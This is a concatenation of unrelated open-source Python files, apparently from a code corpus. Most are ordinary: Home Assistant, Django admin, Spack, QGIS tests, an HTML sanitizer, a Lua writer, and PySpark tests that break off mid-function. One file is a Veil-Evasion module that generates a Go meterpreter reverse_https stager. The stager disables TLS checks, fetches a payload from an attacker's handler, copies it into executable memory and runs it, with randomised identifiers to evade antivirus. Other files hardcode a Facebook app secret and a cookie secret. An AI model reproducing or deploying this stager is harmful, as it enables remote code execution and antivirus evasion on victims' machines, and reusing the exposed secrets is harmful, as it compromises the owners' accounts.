"""Set up the IHC integration."""
url = conf[CONF_URL]
username = conf[CONF_USERNAME]
password = conf[CONF_PASSWORD]
ihc_controller = IHCController(url, username, password)
if not ihc_controller.authenticate():
_LOGGER.error("Unable to authenticate on IHC controller")
return False
if conf[CONF_AUTOSETUP] and not autosetup_ihc_products(
hass, config, ihc_controller, controller_id
):
return False
# Manual configuration
get_manual_configuration(hass, config, conf, ihc_controller, controller_id)
# Store controller configuration
ihc_key = f"ihc{controller_id}"
hass.data[ihc_key] = {IHC_CONTROLLER: ihc_controller, IHC_INFO: conf[CONF_INFO]}
# We only want to register the service functions once for the first controller
if controller_id == 0:
setup_service_functions(hass)
return True
def get_manual_configuration(hass, config, conf, ihc_controller, controller_id):
"""Get manual configuration for IHC devices."""
for platform in PLATFORMS:
discovery_info = {}
if platform in conf:
platform_setup = conf.get(platform)
for sensor_cfg in platform_setup:
name = sensor_cfg[CONF_NAME]
device = {
"ihc_id": sensor_cfg[CONF_ID],
"ctrl_id": controller_id,
"product": {
"name": name,
"note": sensor_cfg.get(CONF_NOTE) or "",
"position": sensor_cfg.get(CONF_POSITION) or "",
},
"product_cfg": {
"type": sensor_cfg.get(CONF_TYPE),
"inverting": sensor_cfg.get(CONF_INVERTING),
"off_id": sensor_cfg.get(CONF_OFF_ID),
"on_id": sensor_cfg.get(CONF_ON_ID),
"dimmable": sensor_cfg.get(CONF_DIMMABLE),
"unit_of_measurement": sensor_cfg.get(CONF_UNIT_OF_MEASUREMENT),
},
}
discovery_info[name] = device
if discovery_info:
discovery.load_platform(hass, platform, DOMAIN, discovery_info, config)
def autosetup_ihc_products(hass: HomeAssistant, config, ihc_controller, controller_id):
"""Auto setup of IHC products from the IHC project file."""
project_xml = ihc_controller.get_project()
if not project_xml:
_LOGGER.error("Unable to read project from IHC controller")
return False
project = ElementTree.fromstring(project_xml)
# If an auto setup file exist in the configuration it will override
yaml_path = hass.config.path(AUTO_SETUP_YAML)
if not os.path.isfile(yaml_path):
yaml_path = os.path.join(os.path.dirname(__file__), AUTO_SETUP_YAML)
yaml = load_yaml_config_file(yaml_path)
try:
auto_setup_conf = AUTO_SETUP_SCHEMA(yaml)
except vol.Invalid as exception:
_LOGGER.error("Invalid IHC auto setup data: %s", exception)
return False
groups = project.findall(".//group")
for platform in PLATFORMS:
platform_setup = auto_setup_conf[platform]
discovery_info = get_discovery_info(platform_setup, groups, controller_id)
if discovery_info:
discovery.load_platform(hass, platform, DOMAIN, discovery_info, config)
return True
def get_discovery_info(platform_setup, groups, controller_id):
"""Get discovery info for specified IHC platform."""
discovery_data = {}
for group in groups:
groupname = group.attrib["name"]
for product_cfg in platform_setup:
products = group.findall(product_cfg[CONF_XPATH])
for product in products:
nodes = product.findall(product_cfg[CONF_NODE])
for node in nodes:
if "setting" in node.attrib and node.attrib["setting"] == "yes":
continue
ihc_id = int(node.attrib["id"].strip("_"), 0)
name = f"{groupname}_{ihc_id}"
device = {
"ihc_id": ihc_id,
"ctrl_id": controller_id,
"product": {
"name": product.get("name") or "",
"note": product.get("note") or "",
"position": product.get("position") or "",
},
"product_cfg": product_cfg,
}
discovery_data[name] = device
return discovery_data
def setup_service_functions(hass: HomeAssistant):
"""Set up the IHC service functions."""
def _get_controller(call):
controller_id = call.data[ATTR_CONTROLLER_ID]
ihc_key = f"ihc{controller_id}"
return hass.data[ihc_key][IHC_CONTROLLER]
def set_runtime_value_bool(call):
"""Set a IHC runtime bool value service function."""
ihc_id = call.data[ATTR_IHC_ID]
value = call.data[ATTR_VALUE]
ihc_controller = _get_controller(call)
ihc_controller.set_runtime_value_bool(ihc_id, value)
def set_runtime_value_int(call):
"""Set a IHC runtime integer value service function."""
ihc_id = call.data[ATTR_IHC_ID]
value = call.data[ATTR_VALUE]
ihc_controller = _get_controller(call)
ihc_controller.set_runtime_value_int(ihc_id, value)
def set_runtime_value_float(call):
"""Set a IHC runtime float value service function."""
ihc_id = call.data[ATTR_IHC_ID]
value = call.data[ATTR_VALUE]
ihc_controller = _get_controller(call)
ihc_controller.set_runtime_value_float(ihc_id, value)
async def async_pulse_runtime_input(call):
"""Pulse a IHC controller input function."""
ihc_id = call.data[ATTR_IHC_ID]
ihc_controller = _get_controller(call)
await async_pulse(hass, ihc_controller, ihc_id)
hass.services.register(
DOMAIN,
SERVICE_SET_RUNTIME_VALUE_BOOL,
set_runtime_value_bool,
schema=SET_RUNTIME_VALUE_BOOL_SCHEMA,
)
hass.services.register(
DOMAIN,
SERVICE_SET_RUNTIME_VALUE_INT,
set_runtime_value_int,
schema=SET_RUNTIME_VALUE_INT_SCHEMA,
)
hass.services.register(
DOMAIN,
SERVICE_SET_RUNTIME_VALUE_FLOAT,
set_runtime_value_float,
schema=SET_RUNTIME_VALUE_FLOAT_SCHEMA,
)
hass.services.register(
DOMAIN, SERVICE_PULSE, async_pulse_runtime_input, schema=PULSE_SCHEMA
)
| aronsky/home-assistant | homeassistant/components/ihc/__init__.py | Python | apache-2.0 | 12,995 |
"""
Custom-written pure go meterpreter/reverse_https stager.
Module built by @b00stfr3ak44
"""
from modules.common import shellcode
from modules.common import helpers
from random import randint
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
self.language = "Go"
self.extension = "go"
self.rating = "Normal"
# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = { "LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"],
"compile_to_exe" : ["Y", "Compile to an executable"]}
def generate(self):
memCommit = helpers.randomString()
memReserve = helpers.randomString()
pageExecRW = helpers.randomString()
kernel32 = helpers.randomString()
procVirtualAlloc = helpers.randomString()
base64Url = helpers.randomString()
virtualAlloc = helpers.randomString()
size = helpers.randomString()
addr = helpers.randomString()
err = helpers.randomString()
randBase = helpers.randomString()
length = helpers.randomString()
foo = helpers.randomString()
random = helpers.randomString()
outp = helpers.randomString()
i = helpers.randomString()
randTextBase64URL= helpers.randomString()
getURI = helpers.randomString()
sumVar = helpers.randomString()
checksum8 = helpers.randomString()
uri = helpers.randomString()
value = helpers.randomString()
tr = helpers.randomString()
client = helpers.randomString()
hostAndPort = helpers.randomString()
port = self.required_options["LPORT"][0]
host = self.required_options["LHOST"][0]
response = helpers.randomString()
uriLength = randint(5, 255)
payload = helpers.randomString()
bufferVar = helpers.randomString()
x = helpers.randomString()
payloadCode = "package main\nimport (\n\"crypto/tls\"\n\"syscall\"\n\"unsafe\"\n"
payloadCode += "\"io/ioutil\"\n\"math/rand\"\n\"net/http\"\n\"time\"\n)\n"
payloadCode += "const (\n"
payloadCode += "%s = 0x1000\n" %(memCommit)
payloadCode += "%s = 0x2000\n" %(memReserve)
payloadCode += "%s = 0x40\n)\n" %(pageExecRW)
payloadCode += "var (\n"
payloadCode += "%s = syscall.NewLazyDLL(\"kernel32.dll\")\n" %(kernel32)
payloadCode += "%s = %s.NewProc(\"VirtualAlloc\")\n" %(procVirtualAlloc, kernel32)
payloadCode += "%s = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_\"\n)\n" %(base64Url)
payloadCode += "func %s(%s uintptr) (uintptr, error) {\n" %(virtualAlloc, size)
payloadCode += "%s, _, %s := %s.Call(0, %s, %s|%s, %s)\n" %(addr, err, procVirtualAlloc, size, memReserve, memCommit, pageExecRW)
payloadCode += "if %s == 0 {\nreturn 0, %s\n}\nreturn %s, nil\n}\n" %(addr, err, addr)
payloadCode += "func %s(%s int, %s []byte) string {\n" %(randBase, length, foo)
payloadCode += "%s := rand.New(rand.NewSource(time.Now().UnixNano()))\n" %(random)
payloadCode += "var %s []byte\n" %(outp)
payloadCode += "for %s := 0; %s < %s; %s++ {\n" %(i, i, length, i)
payloadCode += "%s = append(%s, %s[%s.Intn(len(%s))])\n}\n" %(outp, outp, foo, random, foo)
payloadCode += "return string(%s)\n}\n" %(outp)
payloadCode += "func %s(%s int) string {\n" %(randTextBase64URL, length)
payloadCode += "%s := []byte(%s)\n" %(foo, base64Url)
payloadCode += "return %s(%s, %s)\n}\n" %(randBase, length, foo)
payloadCode += "func %s(%s, %s int) string {\n" %(getURI, sumVar, length)
payloadCode += "for {\n%s := 0\n%s := %s(%s)\n" %(checksum8, uri, randTextBase64URL, length)
payloadCode += "for _, %s := range []byte(%s) {\n%s += int(%s)\n}\n" %(value, uri, checksum8, value)
payloadCode += "if %s%s == %s {\nreturn \"/\" + %s\n}\n}\n}\n" %(checksum8, '%0x100', sumVar, uri)
payloadCode += "func main() {\n"
payloadCode += "%s := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}\n" %(tr)
payloadCode += "%s := http.Client{Transport: %s}\n" %(client, tr)
payloadCode += "%s := \"https://%s:%s\"\n" %(hostAndPort, host, port)
payloadCode += "%s, _ := %s.Get(%s + %s(92, %s))\n" %(response, client, hostAndPort, getURI, uriLength)
payloadCode += "defer %s.Body.Close()\n" %(response)
payloadCode += "%s, _ := ioutil.ReadAll(%s.Body)\n" %(payload, response)
payloadCode += "%s, _ := %s(uintptr(len(%s)))\n" %(addr, virtualAlloc, payload)
payloadCode += "%s := (*[890000]byte)(unsafe.Pointer(%s))\n" %(bufferVar, addr)
payloadCode += "for %s, %s := range %s {\n" %(x, value, payload)
payloadCode += "%s[%s] = %s\n}\n" %(bufferVar, x, value)
payloadCode += "syscall.Syscall(%s, 0, 0, 0, 0)\n}\n" %(addr)
return payloadCode
| jorik041/Veil-Evasion | modules/payloads/go/meterpreter/rev_https.py | Python | gpl-3.0 | 5,164 |
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 03 15:39:01 2014
@author: FábioPhillip
"""
#!/usr/bin/python
# coding: utf-8
import facebook
import urllib
import urlparse
import subprocess
import warnings
# Hide deprecation warnings. The facebook module isn't that up-to-date (facebook.GraphAPIError).
warnings.filterwarnings('ignore', category=DeprecationWarning)
# Parameters of your app and the id of the profile you want to mess with.
FACEBOOK_APP_ID = '1492384741023161'
FACEBOOK_APP_SECRET = '83476e8740c87f9a4689a2c9da63b158'
FACEBOOK_PROFILE_ID = '1492384741023161' #mesmo de APP_ID
# Trying to get an access token. Very awkward.
oauth_args = dict(client_id = FACEBOOK_APP_ID,
client_secret = FACEBOOK_APP_SECRET,
grant_type = 'client_credentials')
oauth_curl_cmd = ['curl',
'https://graph.facebook.com/oauth/access_token?' + urllib.urlencode(oauth_args)]
oauth_response = subprocess.Popen(oauth_curl_cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE).communicate()[0]
try:
oauth_access_token = urlparse.parse_qs(str(oauth_response))['access_token'][0]
#print oauth_access_token
token_adquirido = facebook.get_app_access_token(FACEBOOK_APP_ID, FACEBOOK_APP_SECRET)
print token_adquirido
g = facebook.GraphAPI(token_adquirido)
# Execute a few sample queries
print '---------------'
print 'Me'
print '---------------'
pp(g.get_object('me'))
print
print '---------------'
print 'My Friends'
print '---------------'
pp(g.get_connections('me', 'friends'))
print
print '---------------'
print 'Cassio'
print '---------------'
pp(g.get_object('100003138583807'))
print
except KeyError:
print('Unable to grab an access token!')
exit()
facebook_graph = facebook.GraphAPI(oauth_access_token)
# Try to post something on the wall.
| Topicos-3-2014/friendlyadvice | tentativaFacebookToken.py | Python | epl-1.0 | 1,977 |
# -*- coding: utf-8 -*-
import collections
import json
import bleach
def strip_html(unclean, tags=None):
"""Sanitize a string, removing (as opposed to escaping) HTML tags
:param unclean: A string to be stripped of HTML tags
:return: stripped string
:rtype: str
"""
if not tags:
tags = []
# We make this noop for non-string, non-collection inputs so this function can be used with higher-order
# functions, such as rapply (recursively applies a function to collections)
if not isinstance(unclean, basestring) and not is_iterable(unclean) and unclean is not None:
return unclean
return bleach.clean(unclean, strip=True, tags=tags, attributes=[], styles=[])
# TODO: Not used anywhere except unit tests? Review for deletion
def clean_tag(data):
"""Format as a valid Tag
:param data: A string to be cleaned
:return: cleaned string
:rtype: str
"""
# TODO: make this a method of Tag?
return escape_html(data).replace('"', '"').replace("'", ''')
def is_iterable(obj):
return isinstance(obj, collections.Iterable)
def is_iterable_but_not_string(obj):
"""Return True if ``obj`` is an iterable object that isn't a string."""
return (is_iterable(obj) and not hasattr(obj, 'strip'))
def escape_html(data):
"""Escape HTML characters in data (as opposed to stripping them out entirely). Will ignore whitelisted tags.
:param data: A string, dict, or list to clean of HTML characters
:return: A cleaned object
:rtype: str or list or dict
"""
if isinstance(data, dict):
return {
key: escape_html(value)
for (key, value) in data.iteritems()
}
if is_iterable_but_not_string(data):
return [
escape_html(value)
for value in data
]
if isinstance(data, basestring):
return bleach.clean(data)
return data
# FIXME: Doesn't raise either type of exception expected, and can probably be deleted along with sole use
def assert_clean(data):
"""Ensure that data is cleaned
:raise: AssertionError
"""
def _ensure_clean(value):
if value != bleach.clean(value):
raise ValueError
return escape_html(data)
# TODO: Remove unescape_entities when mako html safe comes in
def unescape_entities(value, safe=None):
"""
Convert HTML-encoded data (stored in the database) to literal characters.
Intended primarily for endpoints consumed by frameworks that handle their own escaping (eg Knockout)
:param value: A string, dict, or list
:param safe: A dict of escape sequences and characters that can be used to extend the set of
characters that this function will unescape. Use with caution as there are few cases in which
there will be reason to unescape characters beyond '&'.
:return: A string or list or dict without html escape characters
"""
safe_characters = {
'&': '&',
}
if safe and isinstance(safe, dict):
safe_characters.update(safe)
if isinstance(value, dict):
return {
key: unescape_entities(value, safe=safe_characters)
for (key, value) in value.iteritems()
}
if is_iterable_but_not_string(value):
return [
unescape_entities(each, safe=safe_characters)
for each in value
]
if isinstance(value, basestring):
for escape_sequence, character in safe_characters.items():
value = value.replace(escape_sequence, character)
return value
return value
def temp_ampersand_fixer(s):
"""As a workaround for ampersands stored as escape sequences in database, unescape text before use on a safe page
Explicitly differentiate from safe_unescape_html in case use cases/behaviors diverge
"""
return s.replace('&', '&')
def safe_json(value):
"""
Dump a string to JSON in a manner that can be used for JS strings in mako templates.
Providing additional forward-slash escaping to prevent injection of closing markup in strings. See:
http://benalpert.com/2012/08/03/preventing-xss-json.html
:param value: A string to be converted
:return: A JSON-formatted string that explicitly escapes forward slashes when needed
"""
return json.dumps(value).replace('</', '<\\/') # Fix injection of closing markup in strings
| crcresearch/osf.io | website/util/sanitize.py | Python | apache-2.0 | 4,413 |
# -*- coding: utf-8 -*-
from base_writer import BaseWriter
class LuaWriter(BaseWriter):
def begin_write(self):
super(LuaWriter, self).begin_write()
self.output("module(...)", "\n\n")
def write_sheet(self, name, sheet):
self.write_value(name, sheet)
if name == "main_sheet":
self.write_value("main_length", len(sheet), 0)
keys = sheet.keys()
keys.sort()
self.write_value("main_keys", keys, 0)
self.flush()
def write_value(self, name, value, max_indent = None):
self.write_types_comment(name)
if max_indent is None:
max_indent = self.max_indent
self.output(name, " = ")
self.write(value, 1, max_indent)
self.output("\n\n")
self.flush()
def write_comment(self, comment):
self.output("-- ", comment, "\n")
def write(self, value, indent = 1, max_indent = 0):
output = self.output
if value is None:
return output("nil")
tp = type(value)
if tp == bool:
output("true" if value else "false")
elif tp == int:
output("%d" % (value, ))
elif tp == float:
output("%g" % (value, ))
elif tp == str:
output('"%s"' %(value, ))
elif tp == unicode:
output('"%s"' % (value.encode("utf-8"), ))
elif tp == tuple or tp == list:
output("{")
for v in value:
self.newline_indent(indent, max_indent)
self.write(v, indent + 1, max_indent)
output(", ")
if len(value) > 0 and indent <= max_indent:
output("\n")
self._output(indent - 1, "}")
else:
output("}")
elif tp == dict:
output("{")
keys = value.keys()
keys.sort()
for k in keys:
self.newline_indent(indent, max_indent)
output("[")
self.write(k)
output("] = ")
self.write(value[k], indent + 1, max_indent)
output(", ")
if len(value) > 0 and indent <= max_indent:
output("\n")
self._output(indent - 1, "}")
else:
output("}")
else:
raise TypeError, "unsupported type %s" % (str(tp), )
return
def newline_indent(self, indent, max_indent):
if indent <= max_indent:
self.output("\n")
self._output(indent)
| youlanhai/ExcelToCode | xl2code/writers/lua_writer.py | Python | mit | 2,039 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Bcftools(Package):
"""BCFtools is a set of utilities that manipulate variant calls in the
Variant Call Format (VCF) and its binary counterpart BCF. All
commands work transparently with both VCFs and BCFs, both
uncompressed and BGZF-compressed."""
homepage = "http://samtools.github.io/bcftools/"
url = "https://github.com/samtools/bcftools/releases/download/1.3.1/bcftools-1.3.1.tar.bz2"
version('1.4', '50ccf0a073bd70e99cdb3c8be830416e')
version('1.3.1', '575001e9fca37cab0c7a7287ad4b1cdb')
depends_on('zlib')
depends_on('bzip2', when="@1.4:")
# build fails without xz
depends_on('xz', when="@1.4")
def install(self, spec, prefix):
make("prefix=%s" % prefix, "all")
make("prefix=%s" % prefix, "install")
| TheTimmy/spack | var/spack/repos/builtin/packages/bcftools/package.py | Python | lgpl-2.1 | 2,053 |
import os.path
def settingConfig():
settings = dict()
settings['template_path'] = os.path.join(os.path.dirname(__file__), 'template')
settings['static_path'] = os.path.join(os.path.dirname(__file__), 'static')
settings['cookie_secret'] = '0g+Z/5RWQQSS4WL8wyyHvTtfkybuNU1Vr4luVE/Szvg='
settings['xsrf_cookies'] = True
return settings
| initiali/webrasp | settings.py | Python | apache-2.0 | 360 |
"""**Tests for map creation in QGIS plugin.**
"""
__author__ = 'Tim Sutton <tim@linfiniti.com>'
__revision__ = '$Format:%H$'
__date__ = '01/11/2010'
__license__ = "GPL"
__copyright__ = 'Copyright 2012, Australia Indonesia Facility for '
__copyright__ += 'Disaster Reduction'
import unittest
from unittest import expectedFailure
import os
import logging
# Add PARENT directory to path to make test aware of other modules
#pardir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
#sys.path.append(pardir)
from PyQt4 import QtGui
from qgis.core import (QgsMapLayerRegistry,
QgsRectangle,
QgsComposerPicture)
from qgis.gui import QgsMapCanvasLayer
from safe_qgis.safe_interface import temp_dir, unique_filename
from safe_qgis.utilities_test import (getQgisTestApp,
loadLayer,
setJakartaGeoExtent,
checkImages)
from safe_qgis.utilities import setupPrinter, dpiToMeters, qgisVersion
from safe_qgis.map import Map
QGISAPP, CANVAS, IFACE, PARENT = getQgisTestApp()
LOGGER = logging.getLogger('InaSAFE')
class MapTest(unittest.TestCase):
"""Test the InaSAFE Map generator"""
def setUp(self):
"""Setup fixture run before each tests"""
myRegistry = QgsMapLayerRegistry.instance()
myRegistry.removeAllMapLayers()
def test_printToPdf(self):
"""Test making a pdf of the map - this is the most typical use of map.
"""
LOGGER.info('Testing printToPdf')
myLayer, _ = loadLayer('test_shakeimpact.shp')
myCanvasLayer = QgsMapCanvasLayer(myLayer)
CANVAS.setLayerSet([myCanvasLayer])
myRect = QgsRectangle(106.7894, -6.2308, 106.8004, -6.2264)
CANVAS.setExtent(myRect)
CANVAS.refresh()
myMap = Map(IFACE)
myMap.setImpactLayer(myLayer)
myMap.composeMap()
myPath = unique_filename(prefix='mapPdfTest',
suffix='.pdf',
dir=temp_dir('test'))
myMap.printToPdf(myPath)
LOGGER.debug(myPath)
myMessage = 'Rendered output does not exist: %s' % myPath
assert os.path.exists(myPath), myMessage
# pdf rendering is non deterministic so we can't do a hash check
# test_renderComposition renders just the image instead of pdf
# so we hash check there and here we just do a basic minimum file
# size check.
mySize = os.stat(myPath).st_size
myExpectedSize = 352798 # as rendered on linux ub 12.04 64
myMessage = 'Expected rendered map pdf to be at least %s, got %s' % (
myExpectedSize, mySize)
assert mySize >= myExpectedSize, myMessage
def test_renderComposition(self):
"""Test making an image of the map only."""
LOGGER.info('Testing renderComposition')
myLayer, _ = loadLayer('test_shakeimpact.shp')
myCanvasLayer = QgsMapCanvasLayer(myLayer)
CANVAS.setLayerSet([myCanvasLayer])
myRect = QgsRectangle(106.7894, -6.2308, 106.8004, -6.2264)
CANVAS.setExtent(myRect)
CANVAS.refresh()
myMap = Map(IFACE)
myMap.setImpactLayer(myLayer)
myMap.composeMap()
myImagePath, myControlImage, myTargetArea = myMap.renderComposition()
LOGGER.debug(myImagePath)
assert myControlImage is not None
myDimensions = [myTargetArea.left(),
myTargetArea.top(),
myTargetArea.bottom(),
myTargetArea.right()]
myExpectedDimensions = [0.0, 0.0, 3507.0, 2480.0]
myMessage = 'Expected target area to be %s, got %s' % (
str(myExpectedDimensions), str(myDimensions))
assert myExpectedDimensions == myDimensions, myMessage
myMessage = 'Rendered output does not exist'
assert os.path.exists(myImagePath), myMessage
myAcceptableImages = ['renderComposition.png',
'renderComposition-variantUB12.04.png',
'renderComposition-variantUB12.10.png',
'renderComposition-variantWindosVistaSP2-32.png',
'renderComposition-variantJenkins.png',
'renderComposition-variantUB11.10-64.png',
'renderComposition-variantUB11.04-64.png']
# Beta version and version changes can introduce a few extra chars
# into the metadata section so we set a reasonable tolerance to cope
# with this.
myTolerance = 8000
myFlag, myMessage = checkImages(myAcceptableImages,
myImagePath,
myTolerance)
assert myFlag, myMessage
def test_getMapTitle(self):
"""Getting the map title from the keywords"""
myLayer, _ = loadLayer('test_floodimpact.tif')
myMap = Map(IFACE)
myMap.setImpactLayer(myLayer)
myTitle = myMap.getMapTitle()
myExpectedTitle = 'Penduduk yang Mungkin dievakuasi'
myMessage = 'Expected: %s\nGot:\n %s' % (myExpectedTitle, myTitle)
assert myTitle == myExpectedTitle, myMessage
def test_handleMissingMapTitle(self):
"""Missing map title from the keywords fails gracefully"""
# TODO running OSM Buildngs with Pendudk Jakarta
# wasthrowing an error when requesting map title
# that this test wasnt replicating well
myLayer, _ = loadLayer('population_padang_1.asc')
myMap = Map(IFACE)
myMap.setImpactLayer(myLayer)
myTitle = myMap.getMapTitle()
myExpectedTitle = None
myMessage = 'Expected: %s\nGot:\n %s' % (myExpectedTitle, myTitle)
assert myTitle == myExpectedTitle, myMessage
@expectedFailure
def Xtest_renderTemplate(self):
"""Test that load template works"""
#Use the template from our resources bundle
myInPath = ':/plugins/inasafe/basic.qpt'
myLayer, _ = loadLayer('test_shakeimpact.shp')
myCanvasLayer = QgsMapCanvasLayer(myLayer)
CANVAS.setLayerSet([myCanvasLayer])
myMap = Map(IFACE)
setJakartaGeoExtent()
myMap.setImpactLayer(myLayer)
myPath = unique_filename(prefix='outTemplate',
suffix='.pdf',
dir=temp_dir('test'))
LOGGER.debug(myPath)
myMap.renderTemplate(myInPath, myPath)
assert os.path.exists(myPath)
#os.remove(myPath)
def test_windowsDrawingArtifacts(self):
"""Test that windows rendering does not make artifacts"""
# sometimes spurious lines are drawn on the layout
LOGGER.info('Testing windowsDrawingArtifacts')
myPath = unique_filename(prefix='artifacts',
suffix='.pdf',
dir=temp_dir('test'))
myMap = Map(IFACE)
setupPrinter(myPath)
myMap.setupComposition()
myImage = QtGui.QImage(10, 10, QtGui.QImage.Format_RGB32)
myImage.setDotsPerMeterX(dpiToMeters(300))
myImage.setDotsPerMeterY(dpiToMeters(300))
#myImage.fill(QtGui.QColor(250, 250, 250))
# Look at the output, you will see antialiasing issues around some
# of the boxes drawn...
# myImage.fill(QtGui.QColor(200, 200, 200))
myImage.fill(200 + 200 * 256 + 200 * 256 * 256)
myFilename = os.path.join(temp_dir(), 'greyBox')
myImage.save(myFilename, 'PNG')
for i in range(10, 190, 10):
myPicture = QgsComposerPicture(myMap.composition)
myPicture.setPictureFile(myFilename)
if qgisVersion() >= 10800: # 1.8 or newer
myPicture.setFrameEnabled(False)
else:
myPicture.setFrame(False)
myPicture.setItemPosition(i, # x
i, # y
10, # width
10) # height
myMap.composition.addItem(myPicture)
# Same drawing drawn directly as a pixmap
myPixmapItem = myMap.composition.addPixmap(
QtGui.QPixmap.fromImage(myImage))
myPixmapItem.setOffset(i, i + 20)
# Same drawing using our drawImage Helper
myWidthMM = 1
myMap.drawImage(myImage, myWidthMM, i, i + 40)
myImagePath, _, _ = myMap.renderComposition()
# when this test no longer matches our broken render hash
# we know the issue is fixed
myControlImages = ['windowsArtifacts.png']
myTolerance = 0
myFlag, myMessage = checkImages(myControlImages,
myImagePath,
myTolerance)
myMessage += ('\nWe want these images to match, if they do not '
'there may be rendering artifacts in windows.\n')
assert myFlag, myMessage
if __name__ == '__main__':
suite = unittest.makeSuite(MapTest, 'test')
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
| gijs/inasafe | safe_qgis/test_map.py | Python | gpl-3.0 | 9,289 |
from django.contrib import admin
from systems.models import Machine, Environment
admin.site.register(Machine)
admin.site.register(Environment) | akvo/butler | butler/systems/admin.py | Python | agpl-3.0 | 143 |
from django.contrib import admin
from django.forms import widgets
from django.contrib import messages
from django.shortcuts import redirect
from .models import Backend, Embed
from .forms import EmbedForm
from .admin_forms import EmbedFormPreview
class BackendAdmin(admin.ModelAdmin):
list_display = ['name', 'regex', 'priority']
readonly_fields = ['code_path']
fieldsets = (
('Information', {
'fields': ('name', 'code_path', 'description')
}),
('Matching Behavior', {
'fields': ('regex', 'priority')
}),
)
# remove "Add" button
change_list_template = 'embeds/admin/change_list_template.html'
def formfield_for_dbfield(self, db_field, **kwargs):
"""Change the form widget for the description field"""
formfield = super(BackendAdmin, self)\
.formfield_for_dbfield(db_field, **kwargs)
if db_field.name == 'description':
formfield.widget = widgets.Textarea(attrs=formfield.widget.attrs)
return formfield
def add_view(self, request, *args, **kwargs):
"""Override the Add view with messaging and a redirect"""
messages.error(request, 'New Backends cannot be added via the Admin.')
return redirect('admin:embeds_backend_changelist')
class EmbedAdmin(admin.ModelAdmin):
list_display = ['url', 'title', 'backend_name',
'provider', 'type', 'cached']
list_filter = ['backend__name', 'provider', 'type']
search_fields = ['url', 'response_cache']
def title(self, obj):
return obj.response.title if obj.response else ''
def backend_name(self, obj):
return obj.backend.name
backend_name.short_description = "Backend"
def cached(self, obj):
return bool(obj.response_cache)
cached.boolean = True
def get_urls(self):
try:
from django.conf.urls import patterns, url
except ImportError: # DROP_WITH_DJANGO13 # pragma: no cover
from django.conf.urls.defaults import patterns, url
info = self.model._meta.app_label, self.model._meta.object_name.lower()
my_urls = patterns('',
url(r'^add/$', EmbedFormPreview(EmbedForm, self), name='%s_%s_add' % info),
url(r'^(\d+)/$', EmbedFormPreview(EmbedForm, self), name='%s_%s_change' % info),
)
return my_urls + super(EmbedAdmin, self).get_urls()
admin.site.register(Embed, EmbedAdmin)
admin.site.register(Backend, BackendAdmin)
| armstrong/armstrong.apps.embeds | armstrong/apps/embeds/admin.py | Python | apache-2.0 | 2,509 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import random
import shutil
import stat
import sys
import tempfile
import time
import unittest
from pyspark import SparkConf, SparkContext, TaskContext, BarrierTaskContext
from pyspark.testing.utils import PySparkTestCase, SPARK_HOME
if sys.version_info[0] >= 3:
xrange = range
class TaskContextTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
# Allow retries even though they are normally disabled in local mode
self.sc = SparkContext('local[4, 2]', class_name)
def test_stage_id(self):
"""Test the stage ids are available and incrementing as expected."""
rdd = self.sc.parallelize(range(10))
stage1 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
stage2 = rdd.map(lambda x: TaskContext.get().stageId()).take(1)[0]
# Test using the constructor directly rather than the get()
stage3 = rdd.map(lambda x: TaskContext().stageId()).take(1)[0]
self.assertEqual(stage1 + 1, stage2)
self.assertEqual(stage1 + 2, stage3)
self.assertEqual(stage2 + 1, stage3)
def test_resources(self):
"""Test the resources are empty by default."""
rdd = self.sc.parallelize(range(10))
resources1 = rdd.map(lambda x: TaskContext.get().resources()).take(1)[0]
# Test using the constructor directly rather than the get()
resources2 = rdd.map(lambda x: TaskContext().resources()).take(1)[0]
self.assertEqual(len(resources1), 0)
self.assertEqual(len(resources2), 0)
def test_partition_id(self):
"""Test the partition id."""
rdd1 = self.sc.parallelize(range(10), 1)
rdd2 = self.sc.parallelize(range(10), 2)
pids1 = rdd1.map(lambda x: TaskContext.get().partitionId()).collect()
pids2 = rdd2.map(lambda x: TaskContext.get().partitionId()).collect()
self.assertEqual(0, pids1[0])
self.assertEqual(0, pids1[9])
self.assertEqual(0, pids2[0])
self.assertEqual(1, pids2[9])
def test_attempt_number(self):
"""Verify the attempt numbers are correctly reported."""
rdd = self.sc.parallelize(range(10))
# Verify a simple job with no failures
attempt_numbers = rdd.map(lambda x: TaskContext.get().attemptNumber()).collect()
map(lambda attempt: self.assertEqual(0, attempt), attempt_numbers)
def fail_on_first(x):
"""Fail on the first attempt so we get a positive attempt number"""
tc = TaskContext.get()
